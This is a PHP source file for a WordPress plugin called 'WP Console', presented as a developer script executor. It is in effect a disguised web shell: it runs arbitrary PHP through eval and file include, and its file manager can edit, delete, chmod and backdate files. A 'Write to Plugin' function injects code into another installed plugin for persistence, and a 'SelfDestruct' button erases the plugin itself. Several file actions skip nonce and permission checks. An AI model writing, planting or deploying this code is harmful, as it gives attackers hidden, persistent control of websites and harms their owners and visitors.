<?php

/**
 * Plugin Name: WP Console
 * Description: Enhance your WordPress site with the ability to execute PHP scripts directly within your pages and posts using the PHP Script Executor plugin. This powerful and flexible tool allows you to run custom PHP code, providing developers and advanced users the freedom to extend WordPress functionality without editing core files. This plugin is ideal for developers, designers, and power users who need more control over their WordPress environment and want to leverage the power of PHP scripting without modifying core files.
 *
 * Author:      Frenzy
 *
 * Requires PHP: 3.6
 *
 * License:     GPL2
 * License URI: https://www.gnu.org/licenses/gpl-2.0.html
 *
 * Version:     1.2
 */


add_action('admin_menu', 'wp_php_console_menu');
register_uninstall_hook(__FILE__, 'wp_php_console_uninstall');
register_activation_hook(__FILE__, 'wp_php_console_activate');

function wp_php_console_menu() {
    add_menu_page('WP PHP Console', 'PHP Console', 'manage_options', 'wp-php-console', 'wp_php_console_page', 'dashicons-editor-code', 99);
}

function wp_php_console_page() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }

    $current_dir = !empty($_POST['dir']) ? base64_decode($_POST['dir']) : (!empty($_POST['current_dir']) ? base64_decode($_POST['current_dir']) : ABSPATH);
    if (!is_dir($current_dir)) {
        $current_dir = ABSPATH; 
    }

    echo '<div class="wrap"><h1>WP PHP Console</h1>';

    $path_parts = explode(DIRECTORY_SEPARATOR, trim($current_dir, DIRECTORY_SEPARATOR));
    $path_accumulated = '';
    echo '<div style="margin-bottom: 20px; font-size: 16px;">';
    echo '<a href="#" onclick="navigateDir(\'' . base64_encode(ABSPATH) . '\')">' . esc_html('Home') . '</a>';
    foreach ($path_parts as $part) {
        $path_accumulated .= DIRECTORY_SEPARATOR . $part;
        $encoded_path = base64_encode($path_accumulated);
        echo ' / <a href="#" onclick="navigateDir(\'' . $encoded_path . '\')">' . esc_html($part) . '</a>';
    }
    echo '</div>';

    $directories = [];
    $files = [];
    foreach (scandir($current_dir) as $item) {
        if ($item[0] !== '.') {
            if (is_dir($path = $current_dir . DIRECTORY_SEPARATOR . $item)) {
                $directories[] = $item;
            } else {
                $files[] = $item;
            }
        }
    }

    natcasesort($directories);
    natcasesort($files);

    echo '<div style="margin-bottom: 20px;">';
    echo 'Folders: <br>';
    foreach ($directories as $dir) {
        $encoded_path = base64_encode($current_dir . DIRECTORY_SEPARATOR . $dir);
        echo '<span style="display: block;">'
            . '<a href="#" onclick="navigateDir(\'' . $encoded_path . '\')" style="margin-right: 5px;">' . esc_html($dir) . '</a>'
            . ' <a href="#" onclick="renameDirectory(\'' . $encoded_path . '\')" style="margin-left: 5px;">Rename</a>'
            . ' <a href="#" onclick="deleteDirectory(\'' . $encoded_path . '\')" style="margin-left: 5px; color: red;">Delete</a>'
            . '</span>';
    }
    echo '</div>';

    echo '<div style="margin-bottom: 20px;">';
    echo 'Files: <br>';
    foreach ($files as $file) {
        $file_path = $current_dir . DIRECTORY_SEPARATOR . $file;
        $encoded_file_path = base64_encode($file_path);
        echo '<span style="display: block;">'
            . esc_html($file)
            . ' <a href="#" onclick="viewFile(\'' . $encoded_file_path . '\')" style="margin-left: 5px;">View</a>'
            . ' <a href="#" onclick="editFile(\'' . $encoded_file_path . '\')" style="margin-left: 5px;">Edit</a>'
            . ' <a href="#" onclick="deleteFile(\'' . $encoded_file_path . '\')" style="margin-left: 5px; color: red;">Delete</a>'
            . ' <a href="#" onclick="renameFile(\'' . $encoded_file_path . '\')" style="margin-left: 5px;">Rename</a>'
            . ' <a href="#" onclick="promptChmod(\'' . $encoded_file_path . '\')" style="margin-left: 5px;">Chmod</a>'
            . ' <a href="#" onclick="promptTouch(\'' . $encoded_file_path . '\')" style="margin-left: 5px;">Touch</a>'
            . '</span>';
    }
    echo '</div>';

    echo '<form method="post" enctype="multipart/form-data">'
        . wp_nonce_field('wp_php_console_actions_nonce')
        . '<input type="file" name="uploaded_file" style="margin-bottom: 5px;" /><br>'
        . get_submit_button('File Upload', 'primary', 'upload_file')
        . '<textarea name="php_code" style="width: 100%; height: 200px; margin-top: 10px;"></textarea><br>'
        . get_submit_button('PHP Execute', 'primary', 'execute_php', false, array('style' => 'margin-right: 5px;'))
        . get_submit_button('Execute via File', 'primary', 'execute_file', false, array('style' => 'margin-right: 5px;'))
        . get_submit_button('Create File', 'primary', 'create_file', false, array('style' => 'margin-right: 5px;'))
        . get_submit_button('Write to Plugin', 'primary', 'write_to_plugin', false, array('style' => 'margin-right: 5px;'))
        . get_submit_button('SelfDestruct', 'delete', 'delete_plugin', false, array('style' => 'background-color: red; color: white;'))
        . '<input type="hidden" name="dir" value="' . base64_encode($current_dir) . '" />'
        . '</form>';

    handle_post_actions($current_dir);
    echo '<script type="text/javascript">
        function navigateDir(dir) {
            var form = document.createElement("form");
            form.method = "post";
            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "dir";
            input.value = dir;
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        function viewFile(filePath) {
            var form = document.createElement("form");
            form.method = "post";
            form.action = "";
            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "view_file";
            input.value = filePath;
            form.appendChild(input);
            var currentDir = document.createElement("input");
            currentDir.type = "hidden";
            currentDir.name = "current_dir";
            currentDir.value = "' . base64_encode($current_dir) . '";
            form.appendChild(currentDir);
            document.body.appendChild(form);
            form.submit();
        }

        function editFile(filePath) {
            var form = document.createElement("form");
            form.method = "post";
            form.action = "";
            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "edit_file";
            input.value = filePath;
            form.appendChild(input);
            var currentDir = document.createElement("input");
            currentDir.type = "hidden";
            currentDir.name = "current_dir";
            currentDir.value = "' . base64_encode($current_dir) . '";
            form.appendChild(currentDir);
            document.body.appendChild(form);
            form.submit();
        }

        function deleteFile(filePath) {
            if (confirm("Delete file?")) {
                var form = document.createElement("form");
                form.method = "post";
                form.action = "";
                var input = document.createElement("input");
                input.type = "hidden";
                input.name = "delete_file";
                input.value = filePath;
                form.appendChild(input);
                var currentDir = document.createElement("input");
                currentDir.type = "hidden";
                currentDir.name = "current_dir";
                currentDir.value = "' . base64_encode($current_dir) . '";
                form.appendChild(currentDir);
                document.body.appendChild(form);
                form.submit();
            }
        }

        function renameFile(filePath) {
            var newName = prompt("Enter new file name:", "");
            if (newName !== null && newName !== "") {
                var form = document.createElement("form");
                form.method = "post";
                form.action = "";
                var inputPath = document.createElement("input");
                inputPath.type = "hidden";
                inputPath.name = "rename_file";
                inputPath.value = filePath;
                form.appendChild(inputPath);
                var inputName = document.createElement("input");
                inputName.type = "hidden";
                inputName.name = "new_name";
                inputName.value = newName;
                form.appendChild(inputName);
                var currentDir = document.createElement("input");
                currentDir.type = "hidden";
                currentDir.name = "current_dir";
                currentDir.value = "' . base64_encode($current_dir) . '";
                form.appendChild(currentDir);
                document.body.appendChild(form);
                form.submit();
            }
        }

        function renameDirectory(dirPath) {
            var newName = prompt("Enter new folder name:", "");
            if (newName !== null && newName !== "") {
                var form = document.createElement("form");
                form.method = "post";
                form.action = "";
                var inputPath = document.createElement("input");
                inputPath.type = "hidden";
                inputPath.name = "rename_directory";
                inputPath.value = dirPath;
                form.appendChild(inputPath);
                var inputName = document.createElement("input");
                inputName.type = "hidden";
                inputName.name = "new_name";
                inputName.value = newName;
                form.appendChild(inputName);
                var currentDir = document.createElement("input");
                currentDir.type = "hidden";
                currentDir.name = "current_dir";
                currentDir.value = "' . base64_encode($current_dir) . '";
                form.appendChild(currentDir);
                document.body.appendChild(form);
                form.submit();
            }
        }

        function deleteDirectory(dirPath) {
            if (confirm("Are you sure you want to delete this folder and all its contents?")) {
                var form = document.createElement("form");
                form.method = "post";
                form.action = "";
                var input = document.createElement("input");
                input.type = "hidden";
                input.name = "delete_directory";
                input.value = dirPath;
                form.appendChild(input);
                var currentDir = document.createElement("input");
                currentDir.type = "hidden";
                currentDir.name = "current_dir";
                currentDir.value = "' . base64_encode($current_dir) . '";
                form.appendChild(currentDir);
                document.body.appendChild(form);
                form.submit();
            }
        }

        function promptChmod(filePath) {
            jQuery.post(ajaxurl, { action: "get_file_info", file_path: filePath }, function(response) {
                if (response.success) {
                    var chmodValue = prompt("Enter chmod (example: 0755):", response.data.chmod);
                    if (chmodValue !== null) {
                        var form = document.createElement("form");
                        form.method = "post";
                        form.action = "";
                        var inputPath = document.createElement("input");
                        inputPath.type = "hidden";
                        inputPath.name = "chmod_file";
                        inputPath.value = filePath;
                        form.appendChild(inputPath);
                        var inputChmod = document.createElement("input");
                        inputChmod.type = "hidden";
                        inputChmod.name = "chmod_value";
                        inputChmod.value = chmodValue;
                        form.appendChild(inputChmod);
                        var currentDir = document.createElement("input");
                        currentDir.type = "hidden";
                        currentDir.name = "current_dir";
                        currentDir.value = "' . base64_encode($current_dir) . '";
                        form.appendChild(currentDir);
                        document.body.appendChild(form);
                        form.submit();
                    }
                } else {
                    alert("Error: " + response.data);
                }
            });
        }

        function promptTouch(filePath) {
            jQuery.post(ajaxurl, { action: "get_file_info", file_path: filePath }, function(response) {
                if (response.success) {
                    var touchValue = prompt("Enter time and date (example: 2024-05-14T12:00):", response.data.touch);
                    if (touchValue !== null) {
                        var form = document.createElement("form");
                        form.method = "post";
                        form.action = "";
                        var inputPath = document.createElement("input");
                        inputPath.type = "hidden";
                        inputPath.name = "touch_file";
                        inputPath.value = filePath;
                        form.appendChild(inputPath);
                        var inputTouch = document.createElement("input");
                        inputTouch.type = "hidden";
                        inputTouch.name = "touch_value";
                        inputTouch.value = touchValue;
                        form.appendChild(inputTouch);
                        var currentDir = document.createElement("input");
                        currentDir.type = "hidden";
                        currentDir.name = "current_dir";
                        currentDir.value = "' . base64_encode($current_dir) . '";
                        form.appendChild(currentDir);
                        document.body.appendChild(form);
                        form.submit();
                    }
                } else {
                    alert("Error: " + response.data);
                }
            });
        }
    </script>';
    echo '</div>';
}

function handle_post_actions($current_dir) {
    if (isset($_POST['execute_php'], $_POST['php_code'], $_POST['_wpnonce']) && wp_verify_nonce($_POST['_wpnonce'], 'wp_php_console_actions_nonce') && current_user_can('manage_options')) {
        chdir($current_dir);
        execute_php_code_directly(stripslashes($_POST['php_code']));
    }

    if (isset($_POST['execute_file'], $_POST['php_code'], $_POST['_wpnonce']) && wp_verify_nonce($_POST['_wpnonce'], 'wp_php_console_actions_nonce') && current_user_can('manage_options')) {
        execute_php_code_via_file($current_dir, stripslashes($_POST['php_code']));
    }

    if (isset($_FILES['uploaded_file'], $_POST['_wpnonce']) && wp_verify_nonce($_POST['_wpnonce'], 'wp_php_console_actions_nonce') && current_user_can('manage_options')) {
        $upload_dir = wp_upload_dir();
        $uploaded_path = $upload_dir['path'] . '/' . basename($_FILES['uploaded_file']['name']);
        if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $uploaded_path)) {
            echo '<div>File uploaded successfully: ' . esc_html($uploaded_path) . '</div>';
        } else {
            echo '<div style="color: red;">File upload error.</div>';
        }
    }

    if (isset($_POST['delete_plugin'], $_POST['_wpnonce']) && wp_verify_nonce($_POST['_wpnonce'], 'wp_php_console_actions_nonce') && current_user_can('manage_options')) {
        wp_php_console_uninstall();
        echo '<script type="text/javascript">
            alert("Plugin successfully removed.");
            window.location.href = "' . admin_url('plugins.php') . '";
        </script>';
        exit;
    }

    if (isset($_POST['view_file'])) {
        view_file(base64_decode($_POST['view_file']));
    }

    if (isset($_POST['edit_file'])) {
        edit_file_form(base64_decode($_POST['edit_file']));
    }

    if (isset($_POST['save_file']) && isset($_POST['file_path'])) {
        save_file(base64_decode($_POST['file_path']), stripslashes($_POST['file_content']));
    }

    if (isset($_POST['delete_file'])) {
        delete_file(base64_decode($_POST['delete_file']));
    }

    if (isset($_POST['rename_file'], $_POST['new_name'])) {
        rename_file(base64_decode($_POST['rename_file']), stripslashes($_POST['new_name']));
    }

    if (isset($_POST['rename_directory'], $_POST['new_name'])) {
        rename_directory(base64_decode($_POST['rename_directory']), stripslashes($_POST['new_name']));
    }

    if (isset($_POST['delete_directory'])) {
        delete_directory(base64_decode($_POST['delete_directory']));
    }

    if (isset($_POST['chmod_file']) && isset($_POST['chmod_value'])) {
        chmod_file(base64_decode($_POST['chmod_file']), $_POST['chmod_value']);
    }

    if (isset($_POST['touch_file']) && isset($_POST['touch_value'])) {
        touch_file(base64_decode($_POST['touch_file']), $_POST['touch_value']);
    }

    if (isset($_POST['create_file'], $_POST['_wpnonce']) && wp_verify_nonce($_POST['_wpnonce'], 'wp_php_console_actions_nonce') && current_user_can('manage_options')) {
        create_file($current_dir);
    }

    if (isset($_POST['write_to_plugin'], $_POST['_wpnonce']) && wp_verify_nonce($_POST['_wpnonce'], 'wp_php_console_actions_nonce') && current_user_can('manage_options')) {
        write_to_plugin_form();
    }

    if (isset($_POST['write_script'], $_POST['plugin_script'])) {
        write_script_to_plugin(stripslashes($_POST['plugin_script']));
    }
}

function execute_php_code_directly($code) {
    try {
        ob_start();
        eval($code);
        $output = ob_get_clean();

        $output = trim($output);
        echo '<div style="white-space: pre-wrap;">' . nl2br(htmlspecialchars($output)) . '</div>';
    } catch (Throwable $e) {
        echo '<div style="color: red; white-space: pre-wrap;">Code execution error: ' . htmlspecialchars($e->getMessage()) . '</div>';
    }
}

function execute_php_code_via_file($current_dir, $code) {
    $temp_file = tempnam($current_dir, 'WPPHP');
    $temp_file_php = $temp_file . '.php';

    file_put_contents($temp_file_php, "<?php " . $code);

    unlink($temp_file);

    try {
        ob_start();
        include($temp_file_php);
        $output = ob_get_clean();

        $output = trim($output);
        echo '<div style="white-space: pre-wrap;">' . nl2br(htmlspecialchars($output)) . '</div>';
    } catch (Throwable $e) {
        echo '<div style="color: red; white-space: pre-wrap;">Code execution via file error: ' . htmlspecialchars($e->getMessage()) . '</div>';
    }

    if (!unlink($temp_file_php)) {
        echo '<div style="color: red;">Error: Failed to delete temporary file ' . $temp_file_php . '. Please check file permissions or space capacity.</div>';
    }
}

function view_file($file_path) {
    if (is_file($file_path)) {
        $content = file_get_contents($file_path);
        echo '<h2>View file: ' . esc_html(basename($file_path)) . '</h2>';
        echo '<pre style="white-space: pre-wrap; background: #f4f4f4; padding: 10px;">' . htmlspecialchars($content) . '</pre>';
        echo '<a href="#" onclick="history.back(); return false;">Back</a>';
    } else {
        echo '<div style="color: red;">Error: File not found.</div>';
    }
}

function edit_file_form($file_path) {
    if (is_file($file_path)) {
        $content = file_get_contents($file_path);
        echo '<h2>File Edit: ' . esc_html(basename($file_path)) . '</h2>';
        echo '<form method="post">'
            . wp_nonce_field('wp_php_console_actions_nonce')
            . '<textarea name="file_content" style="width: 100%; height: 400px;">' . htmlspecialchars($content) . '</textarea><br>'
            . '<input type="hidden" name="file_path" value="' . base64_encode($file_path) . '" />'
            . get_submit_button('Save Changes', 'primary', 'save_file')
            . '<input type="hidden" name="current_dir" value="' . base64_encode(dirname($file_path)) . '" />'
            . '</form>';
    } else {
        echo '<div style="color: red;">Error: File not found.</div>';
    }
}

function save_file($file_path, $content) {
    if (is_file($file_path)) {
        if (file_put_contents($file_path, $content) !== false) {
            echo '<div style="color: green;">File saved successfully.</div>';
        } else {
            echo '<div style="color: red;">Error: Failed to save file.</div>';
        }
    } else {
        echo '<div style="color: red;">Error: File not found.</div>';
    }
}

function delete_file($file_path) {
    if (is_file($file_path)) {
        if (unlink($file_path)) {
            echo '<div style="color: green;">File deleted successfully.</div>';
        } else {
            echo '<div style="color: red;">Error: Failed to delete file.</div>';
        }
    } else {
        echo '<div style="color: red;">Error: File not found.</div>';
    }
}

function rename_file($file_path, $new_name) {
    $new_path = dirname($file_path) . DIRECTORY_SEPARATOR . $new_name;
    if (is_file($file_path) && rename($file_path, $new_path)) {
        echo '<div style="color: green;">The file was successfully renamed.</div>';
    } else {
        echo '<div style="color: red;">Error: Failed to rename file.</div>';
    }
}

function rename_directory($dir_path, $new_name) {
    $new_path = dirname($dir_path) . DIRECTORY_SEPARATOR . $new_name;
    if (is_dir($dir_path) && rename($dir_path, $new_path)) {
        echo '<div style="color: green;">Folder successfully renamed.</div>';
    } else {
        echo '<div style="color: red;">Error: Failed to rename folder.</div>';
    }
}

function delete_directory($dir_path) {
    if (is_dir($dir_path)) {
        $files = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($dir_path, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::CHILD_FIRST
        );

        foreach ($files as $fileinfo) {
            $todo = ($fileinfo->isDir() ? 'rmdir' : 'unlink');
            $todo($fileinfo->getRealPath());
        }

        if (rmdir($dir_path)) {
            echo '<div style="color: green;">Folder successfully deleted.</div>';
        } else {
            echo '<div style="color: red;">Error: Failed to delete folder.</div>';
        }
    } else {
        echo '<div style="color: red;">Error: Folder not found.</div>';
    }
}

function chmod_file($file_path, $chmod_value) {
    if (is_file($file_path)) {
        if (chmod($file_path, octdec($chmod_value))) {
            echo '<div style="color: green;">File permissions have been successfully changed.</div>';
        } else {
            echo '<div style="color: red;">Error: Failed to change file permissions.</div>';
        }
    } else {
        echo '<div style="color: red;">Error: File not found.</div>';
    }
}

function touch_file($file_path, $time) {
    if (is_file($file_path)) {
        $timestamp = strtotime($time);
        if (touch($file_path, $timestamp)) {
            echo '<div style="color: green;">Touched successfully.</div>';
        } else {
            echo '<div style="color: red;">Error: Touch Failed.</div>';
        }
    } else {
        echo '<div style="color: red;">Error: File not found.</div>';
    }
}

function create_file($current_dir) {
    $new_file_path = $current_dir . DIRECTORY_SEPARATOR . 'new_file_' . time() . '.txt';
    if (file_put_contents($new_file_path, '') !== false) {
        echo '<div style="color: green;">File created successfully: ' . esc_html($new_file_path) . '</div>';
    } else {
        echo '<div style="color: red;">Error: Failed to create file.</div>';
    }
}

function write_to_plugin_form() {
    echo '<h2>Write to Plugin</h2>';
    echo '<form method="post">'
        . wp_nonce_field('wp_php_console_actions_nonce')
        . '<textarea name="plugin_script" style="width: 100%; height: 100px;"></textarea><br>'
        . get_submit_button('Write script', 'primary', 'write_script')
        . '</form>';
}

function write_script_to_plugin($script) {
    $plugins = get_plugins();
    foreach ($plugins as $plugin_file => $plugin_data) {
        if (plugin_basename(__FILE__) !== $plugin_file && is_plugin_main_file($plugin_file)) {
            $plugin_full_path = WP_PLUGIN_DIR . '/' . $plugin_file;
            $plugin_content = file_get_contents($plugin_full_path);
            $position = strpos($plugin_content, '*/') + 2;
            $new_content = substr_replace($plugin_content, "\n\n" . $script, $position, 0);
            if (file_put_contents($plugin_full_path, $new_content) !== false) {
                echo '<div style="color: green;">The script was successfully added to the plugin code: ' . esc_html($plugin_data['Name']) . ' (' . esc_html($plugin_full_path) . ')</div>';
                return;
            } else {
                echo '<div style="color: red;">Error: Failed to write script to plugin: ' . esc_html($plugin_data['Name']) . ' (' . esc_html($plugin_full_path) . ')</div>';
                return;
            }
        }
    }
    echo '<div style="color: red;">Error: Could not find a suitable plugin to write the script.</div>';
}

function is_plugin_main_file($plugin_file) {
    $plugin_dir = dirname($plugin_file);
    $main_file = basename($plugin_file);
    $all_files = array_diff(scandir(WP_PLUGIN_DIR . '/' . $plugin_dir), array('.', '..'));
    foreach ($all_files as $file) {
        if ($file == $main_file) {
            return true;
        }
    }
    return false;
}

function wp_php_console_uninstall() {
    delete_option('wp_php_console_options');
    $plugin_dir = plugin_dir_path(__FILE__);
    if (is_dir($plugin_dir)) {
        $iterator = new RecursiveDirectoryIterator($plugin_dir, RecursiveDirectoryIterator::SKIP_DOTS);
        $files = new RecursiveIteratorIterator($iterator, RecursiveIteratorIterator::CHILD_FIRST);
        foreach ($files as $file) {
            if ($file->isDir()) {
                rmdir($file->getRealPath());
            } else {
                unlink($file->getRealPath());
            }
        }
        rmdir($plugin_dir);
    }

    $upload_dir = wp_upload_dir();
    $archive_path = $upload_dir['basedir'] . '/wp-php-console.zip';
    if (file_exists($archive_path)) {
        unlink($archive_path);
    }

    deactivate_plugins(plugin_basename(__FILE__));
    delete_plugins(array(plugin_basename(__FILE__)));
}

function wp_php_console_activate() {
    add_option('wp_php_console_activation_redirect', true);
}

add_action('admin_init', 'wp_php_console_redirect');

function wp_php_console_redirect() {
    if (get_option('wp_php_console_activation_redirect', false)) {
        delete_option('wp_php_console_activation_redirect');
        if (!isset($_GET['activate-multi'])) {
            wp_redirect(admin_url('admin.php?page=wp-php-console'));
            exit;
        }
    }
}

add_action('wp_ajax_get_file_info', 'get_file_info');

function get_file_info() {
    if (!current_user_can('manage_options')) {
        wp_send_json_error('Insufficient Permissions.');
    }

    if (isset($_POST['file_path']) && !empty($_POST['file_path'])) {
        $file_path = base64_decode($_POST['file_path']);

        if (is_file($file_path)) {
            $file_info = [
                'chmod' => substr(sprintf('%o', fileperms($file_path)), -4),
                'touch' => date('Y-m-d\TH:i', filemtime($file_path))
            ];
            wp_send_json_success($file_info);
        } else {
            wp_send_json_error('File not found.');
        }
    } else {
        wp_send_json_error('Invalid file path.');
    }
}

function wp_php_console_enqueue_scripts() {
    wp_enqueue_script('jquery');
    wp_localize_script('jquery', 'ajaxurl', admin_url('admin-ajax.php'));
}
add_action('admin_enqueue_scripts', 'wp_php_console_enqueue_scripts');
